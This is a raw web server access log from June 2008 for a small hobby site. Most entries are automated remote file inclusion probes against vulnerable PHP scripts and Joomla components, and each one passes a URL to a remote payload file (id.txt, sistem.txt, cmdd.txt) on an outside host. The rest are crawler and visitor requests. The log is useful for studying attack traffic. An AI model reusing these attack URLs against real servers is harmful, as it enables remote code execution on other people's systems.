64.185.237.149 - - [08/Jun/2008:02:46:34 -0500] "GET /logs/includes/db_connect.php?baseDir=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
64.185.237.149 - - [08/Jun/2008:02:46:35 -0500] "GET /includes/db_connect.php?baseDir=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.29.83.181 - - [08/Jun/2008:02:47:05 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://musicampus.net/alb?? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
72.29.83.181 - - [08/Jun/2008:02:47:05 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://musicampus.net/alb?? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
89.104.78.250 - - [08/Jun/2008:02:52:58 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ningkelle.co.cc/nid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
89.104.78.250 - - [08/Jun/2008:02:52:59 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ningkelle.co.cc/nid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
74.6.20.96 - - [08/Jun/2008:02:59:56 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.166 - - [08/Jun/2008:02:59:56 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.165.176.167 - - [08/Jun/2008:03:03:27 -0500] "GET /logs//errors.php?error=http://geocities.com/dayak_ibant/tol.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
82.165.176.167 - - [08/Jun/2008:03:03:27 -0500] "GET //errors.php?error=http://geocities.com/dayak_ibant/tol.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
77.87.191.61 - - [08/Jun/2008:03:04:29 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
77.87.191.61 - - [08/Jun/2008:03:04:30 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.grupslactancia.info/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
65.55.208.136 - - [08/Jun/2008:03:07:07 -0500] "GET /logs/access_log.1177459200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [08/Jun/2008:03:07:07 -0500] "GET /logs/access_log.1171065600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [08/Jun/2008:03:09:28 -0500] "GET /logs/access_log.1191888000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
82.194.62.227 - - [08/Jun/2008:03:26:22 -0500] "GET /logs/access_log.1207440000 HTTP/1.1" 200 248470 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
74.6.22.166 - - [08/Jun/2008:03:27:38 -0500] "GET /logs/access_log.1186272000 HTTP/1.0" 200 195035 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.2.100.138 - - [08/Jun/2008:03:29:31 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
62.2.100.138 - - [08/Jun/2008:03:29:35 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
67.195.37.158 - - [08/Jun/2008:03:36:51 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
68.76.31.154 - - [08/Jun/2008:03:49:51 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
68.76.31.154 - - [08/Jun/2008:03:49:52 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
62.140.19.142 - - [08/Jun/2008:03:58:51 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
65.55.208.131 - - [08/Jun/2008:03:58:51 -0500] "GET /logs/access_log.1191024000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
62.140.19.142 - - [08/Jun/2008:03:58:51 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
89.218.85.18 - - [08/Jun/2008:04:00:25 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.218.85.18 - - [08/Jun/2008:04:00:25 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.77.11.177 - - [08/Jun/2008:04:01:15 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/cmdd.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
82.77.11.177 - - [08/Jun/2008:04:01:15 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://o-x-r-a-n-a.ru/forum/language/.lang/cmdd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
208.43.1.19 - - [08/Jun/2008:04:02:13 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
208.43.1.19 - - [08/Jun/2008:04:02:13 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
82.192.70.11 - - [08/Jun/2008:04:12:21 -0500] "GET /logs/access_log.1188777600/index.php?go=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.64"
82.192.70.11 - - [08/Jun/2008:04:12:21 -0500] "GET /index.php?go=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.64"
82.192.70.11 - - [08/Jun/2008:04:12:21 -0500] "GET /logs/index.php?go=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.64"
82.192.70.11 - - [08/Jun/2008:04:13:23 -0500] "GET /logs/access_log.1182038400/index.php?go=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.64"
64.118.88.84 - - [08/Jun/2008:04:14:16 -0500] "GET /logs/access_log.1208649600//oneadmin/config.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
64.118.88.84 - - [08/Jun/2008:04:14:16 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
64.118.88.84 - - [08/Jun/2008:04:14:16 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
64.118.88.84 - - [08/Jun/2008:04:14:17 -0500] "GET /logs/access_log.1181952000//oneadmin/config.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
74.6.22.166 - - [08/Jun/2008:04:16:19 -0500] "GET /costume/thmb1.htm HTTP/1.0" 200 3799 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.166 - - [08/Jun/2008:04:20:57 -0500] "GET /logs/access_log.1173744000 HTTP/1.0" 200 223304 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.166 - - [08/Jun/2008:04:23:01 -0500] "GET /logs/access_log.1162339200 HTTP/1.0" 200 213473 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.118.88.84 - - [08/Jun/2008:04:26:44 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
64.118.88.84 - - [08/Jun/2008:04:26:44 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
74.6.22.166 - - [08/Jun/2008:04:27:14 -0500] "GET /logs/access_log.1177372800 HTTP/1.0" 200 103114 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.253.180.165 - - [08/Jun/2008:04:30:50 -0500] "GET /logs/access_log.1208649600/index1.php?x=http://o-x-r-a-n-a.ru/forum/language/.lang/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.69"
207.253.180.165 - - [08/Jun/2008:04:30:50 -0500] "GET /index1.php?x=http://o-x-r-a-n-a.ru/forum/language/.lang/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.69"
207.253.180.165 - - [08/Jun/2008:04:30:51 -0500] "GET /logs/index1.php?x=http://o-x-r-a-n-a.ru/forum/language/.lang/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.69"
62.2.100.138 - - [08/Jun/2008:04:33:03 -0500] "GET /logs/access_log.1208649600//oneadmin/config.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
62.2.100.138 - - [08/Jun/2008:04:33:04 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
62.2.100.138 - - [08/Jun/2008:04:33:05 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
62.2.100.138 - - [08/Jun/2008:04:33:07 -0500] "GET /logs/access_log.1181952000//oneadmin/config.php?path[docroot]=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
74.6.22.166 - - [08/Jun/2008:04:36:48 -0500] "GET /artwork/hospitals.htm HTTP/1.0" 200 3315 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
81.169.129.21 - - [08/Jun/2008:04:38:29 -0500] "GET /logs/access_log.1208649600/modules/My_eGallery/index.php?basepath=http://europe-souvenirs.com/shop/templates_c/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
81.169.129.21 - - [08/Jun/2008:04:38:29 -0500] "GET /modules/My_eGallery/index.php?basepath=http://europe-souvenirs.com/shop/templates_c/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
81.169.129.21 - - [08/Jun/2008:04:38:29 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://europe-souvenirs.com/shop/templates_c/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
213.244.194.177 - - [08/Jun/2008:04:55:38 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13"
213.244.194.177 - - [08/Jun/2008:04:55:44 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13"
213.244.194.177 - - [08/Jun/2008:04:55:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13"
213.244.194.177 - - [08/Jun/2008:04:56:30 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13"
213.244.194.177 - - [08/Jun/2008:04:57:13 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13"
74.6.22.166 - - [08/Jun/2008:05:02:06 -0500] "GET /memorial/ HTTP/1.0" 200 817 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.189 - - [08/Jun/2008:05:02:37 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
84.144.106.73 - - [08/Jun/2008:05:20:10 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?q=vintage+flash&rls=com.microsoft:de:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7GGLR""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Seekmo 10.0.370.0)"
84.144.106.73 - - [08/Jun/2008:05:20:10 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Seekmo 10.0.370.0)"
84.144.106.73 - - [08/Jun/2008:05:20:10 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Seekmo 10.0.370.0)"
84.144.106.73 - - [08/Jun/2008:05:20:11 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Seekmo 10.0.370.0)"
80.37.16.51 - - [08/Jun/2008:05:23:26 -0500] "GET /logs/db.php?path_local=http://www.geocities.com/marvelinnocent/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
80.37.16.51 - - [08/Jun/2008:05:23:26 -0500] "GET /db.php?path_local=http://www.geocities.com/marvelinnocent/id.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.79"
65.55.208.130 - - [08/Jun/2008:05:25:59 -0500] "GET /logs/access_log.1206230400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
80.37.16.51 - - [08/Jun/2008:05:27:16 -0500] "GET /logs/db.php?path_local=http://www.geocities.com/marvelinnocent/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
80.37.16.51 - - [08/Jun/2008:05:27:17 -0500] "GET /db.php?path_local=http://www.geocities.com/marvelinnocent/id.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.79"
202.179.0.195 - - [08/Jun/2008:05:29:46 -0500] "GET /logs/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
202.179.0.195 - - [08/Jun/2008:05:29:47 -0500] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
64.106.143.80 - - [08/Jun/2008:05:30:17 -0500] "GET /logs//errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
64.106.143.80 - - [08/Jun/2008:05:30:17 -0500] "GET //errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
74.6.22.166 - - [08/Jun/2008:05:30:32 -0500] "GET /logs/access_log.1166486400 HTTP/1.0" 200 187283 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.79.168.66 - - [08/Jun/2008:05:48:12 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.811"
66.79.168.66 - - [08/Jun/2008:05:48:12 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
62.75.184.73 - - [08/Jun/2008:05:50:38 -0500] "GET /logs/db.php?path_local=http://scaneru.nm.ru/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
62.75.184.73 - - [08/Jun/2008:05:50:38 -0500] "GET /db.php?path_local=http://scaneru.nm.ru/id.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.803"
62.75.184.73 - - [08/Jun/2008:05:50:41 -0500] "GET /logs/db.php?path_local=http://scaneru.nm.ru/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
62.75.184.73 - - [08/Jun/2008:05:50:41 -0500] "GET /db.php?path_local=http://scaneru.nm.ru/id.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.803"
212.227.65.79 - - [08/Jun/2008:05:52:38 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 332 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
212.227.65.79 - - [08/Jun/2008:05:52:38 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 337 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
72.249.108.180 - - [08/Jun/2008:05:52:40 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
72.249.108.180 - - [08/Jun/2008:05:52:40 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
209.200.229.186 - - [08/Jun/2008:05:53:41 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
209.200.229.186 - - [08/Jun/2008:05:53:42 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
208.115.34.17 - - [08/Jun/2008:05:54:16 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
208.115.34.17 - - [08/Jun/2008:05:54:17 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
207.58.138.166 - - [08/Jun/2008:05:54:21 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.811"
207.58.138.166 - - [08/Jun/2008:05:54:21 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
222.122.28.2 - - [08/Jun/2008:05:54:39 -0500] "GET /logs/db.php?path_local=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
222.122.28.2 - - [08/Jun/2008:05:54:39 -0500] "GET /db.php?path_local=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.79"
72.249.108.180 - - [08/Jun/2008:06:00:04 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.249.108.180 - - [08/Jun/2008:06:00:04 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
132.248.5.4 - - [08/Jun/2008:06:04:08 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
132.248.5.4 - - [08/Jun/2008:06:04:08 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
132.248.5.4 - - [08/Jun/2008:06:04:09 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
132.248.5.4 - - [08/Jun/2008:06:04:09 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.it-history.net/cgi/idscan6?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
201.16.242.3 - - [08/Jun/2008:06:05:34 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.to-excess.de/mh/language/lang_german/mic22.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
201.16.242.3 - - [08/Jun/2008:06:05:35 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.to-excess.de/mh/language/lang_german/mic22.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
203.130.242.48 - - [08/Jun/2008:06:10:50 -0500] "GET /logs/db.php?path_local=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
203.130.242.48 - - [08/Jun/2008:06:10:51 -0500] "GET /db.php?path_local=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
65.55.208.123 - - [08/Jun/2008:06:15:18 -0500] "GET /artwork/dioramas.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
208.80.193.41 - - [08/Jun/2008:06:16:03 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {050850E4-849A-B28F-1C16-E32B7FADCEE8}; .NET CLR 1.1.4322)"
72.249.108.180 - - [08/Jun/2008:06:18:46 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.249.108.180 - - [08/Jun/2008:06:18:46 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://bikebitsuk.com/temp/sistem.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
85.14.4.231 - - [08/Jun/2008:06:21:42 -0500] "GET /logs/db.php?path_local=http://landleben.bieswang.de/cache/osiID.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
85.14.4.231 - - [08/Jun/2008:06:21:42 -0500] "GET /db.php?path_local=http://landleben.bieswang.de/cache/osiID.txt??? HTTP/1.1" 404 290 "-""libwww-perl/5.810"
85.14.4.231 - - [08/Jun/2008:06:22:50 -0500] "GET /db.php?path_local=http://landleben.bieswang.de/cache/osiID.txt??? HTTP/1.1" 404 290 "-""libwww-perl/5.810"
85.14.4.231 - - [08/Jun/2008:06:22:50 -0500] "GET /logs/db.php?path_local=http://landleben.bieswang.de/cache/osiID.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
66.161.131.250 - - [08/Jun/2008:06:23:06 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://202.143.148.58/media/temp.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.64"
66.161.131.250 - - [08/Jun/2008:06:23:06 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://202.143.148.58/media/temp.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.64"
74.6.22.166 - - [08/Jun/2008:06:23:46 -0500] "GET /artwork/playhouse.htm HTTP/1.0" 200 521 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.118.88.84 - - [08/Jun/2008:06:26:55 -0500] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://feuerwehr.k%FCnzell-bachrain.de/cms/components/com_easybook/images/id.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.810"
64.118.88.84 - - [08/Jun/2008:06:26:55 -0500] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://feuerwehr.k%FCnzell-bachrain.de/cms/components/com_easybook/images/id.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.810"
85.14.4.231 - - [08/Jun/2008:06:28:24 -0500] "GET /logs/db.php?path_local=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
85.14.4.231 - - [08/Jun/2008:06:28:24 -0500] "GET /db.php?path_local=http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 290 "-""libwww-perl/5.810"
209.200.229.186 - - [08/Jun/2008:06:28:25 -0500] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 366 "-""libwww-perl/5.810"
209.200.229.186 - - [08/Jun/2008:06:28:25 -0500] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.immanuelkerk-driebergen.nl/components/com_rwcards/lightbox/css/id.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.810"
66.7.193.54 - - [08/Jun/2008:06:35:32 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://202.143.148.58/media/temp.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
66.7.193.54 - - [08/Jun/2008:06:35:32 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://202.143.148.58/media/temp.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
70.86.81.114 - - [08/Jun/2008:06:44:55 -0500] "GET /logs//administrator/components/index2.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 313 "-""Mozilla/5.0"
62.128.131.80 - - [08/Jun/2008:06:49:13 -0500] "GET /logs/index1.php?x=http://www.ympakt.com/Dust_/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
